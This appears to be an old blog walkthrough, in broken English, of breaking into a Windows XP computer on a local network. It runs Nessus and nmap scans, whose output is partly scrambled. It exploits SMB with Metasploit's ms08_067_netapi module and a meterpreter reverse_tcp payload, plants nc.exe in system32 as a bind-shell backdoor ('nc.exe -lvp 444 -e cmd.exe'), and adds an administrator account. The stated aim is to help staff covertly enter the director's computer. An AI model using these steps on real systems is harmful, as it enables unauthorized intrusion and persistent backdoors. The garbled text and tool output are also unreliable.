Backdor Nectcat With SmbOS2C jogja (30/1-2012/02:29PM)- good morning, a right now we will exploit acomputer system the victim with IP address 172.18.10.4. we and victim be localarea network on equal. There Ip attacker 172.18.10.5 and other computer up with ip172.18.10.1. so there we have 3 unit computer to LAN.The ensuing structur skenario network :The Scenario attacker used methode is hacker or attacker a delegate statf, whileattacker recived order form staf to the add user acount on computer director withlevel as administrators acount director. In order to statf can acsess computerdirector, upon office onely a statf can using login to computer director.Oke the next, author begin technique how to add user to computer director withused explot smb. Now attacker need tool aplication to get information avictim(computer director). There we used nessus to find and search port, servicesand vulnerbility application on computer, possible can to hole as do attacker exploitcomputer target. The below we can see web application nessus.
the next we add ip target as object scan to know and find service and port open arehole exploit computer target. To form the below must input information nametarget, type (run now) and policy with choose internal network scan.After we seting ip target next clik button scan launch scan now proses scanningrunning, we waiting ouput scan information about computer victim.Now information port, service and protocol to computer target we get. The next wecan know continue about description about all service. Now we choose protocol tcpwith port 139 is server message protocol to show info detail, the equal is picturescreenshoot information smb.
nmap -A 172.18.10.4We can get information used other scan likes scanner via console is NMAP, the usediffrent nmap and nessus a http://nmap.org ) at 2012-01-30 open port and servcie Starting Nmap 5.61TEST4 ( operation searching and finding 07:15 AFTwith via console. For example using nmap : Nmap scan report for 172.18.10.4 Host is up (0.0019s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft- ds MAC Address: 08:00:27:94:14:34 (Cadmus Computer Systems) Device type: general purpose Running: Microsoft Windows XP OS CPE: cpe:/o:microsoft:windows_xp OS details: Microsoft Windows XP SP2 or SP3 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_nbstat: NetBIOS name: KITNET-02, NetBIOS user:<unknown>, NetBIOS MAC: 08:00:27:94:14:34 (CadmusComputer Systems)| smb-security-mode:| Account that was used for smb scripts: guest| User-level authentication| SMB Security: Challenge/response passwords supported|_ Message signing disabled (dangerous, but default)|_smbv2-enabled: Server doesnt support SMBv2 protocol| smb-os-discovery:| OS: Windows XP (Windows 2000 LAN Manager)| Computer name: kitnet-02| NetBIOS computer name: KITNET-02| Workgroup: WORKGROUP|_ System time: 2012-01-30 07:15:26 UTC-8TRACEROUTEHOP RTT ADDRESS1 1.95 ms 172.18.10.4OS and Service detection performed. Please report anyincorrect results at http://nmap.org/submit/ .
Near also we can see kind infomation uses nessus to nmap, but with nmap donthave description, plugin, pid and solution. Now will exploit computer target :Above picture is metaspolit, here attacker uses exploit framework3 on thebacktrack 4 r2. The next we use exploit smb. We user exploit server mail blockprotocol(smb) with kind exploit exploit/windows/smb/ms08_067_netapi. Andnext we applying payloads to smb using payload meterpreter,windows/meterpreter/reverce_tcp and and we insert host target and hostattacker. While set RHOST is input to host target and set LHOST input to hostattacker.
And we have backdor will send bacdor to computer target.After we include host target and host attacker and know located file backdor tosend computer target, furthermore we do exploit.Now computer direcotor or target wass exploit, through meterperter we can doupload and download file to located computer target. As image upon we can showtechnique upload file backdor to file system32 windows. Upon we type commad
exploit computer attacker was sucsess on system32 computer target. And nowattacker running file backdor nc.exe to command line computer target.Proses listening to port 444 while running. Command nc.exe –lvp 444 –e cmd.exemind file backdor run –l is listening to –p port 444, to port here attacker used port444. Using port up to attacker can used port, 999,888, or 555. And command –vbackdor runing mode verbose (use twice to be more verbose).Now this is mission add user to computer target, atttacker add name user tocomputer targer wiht new user statf password: passtatf. And we can see new userwass add to computer.The next attacker same level access betwen acount director and statf. As picturebelow we can show succses make start level administrators.
And the last computer start trying running nc through he computer, to sure know hehas have acoutn to computer director. TRADANGggg..... success complete themission a attacker on the jobs.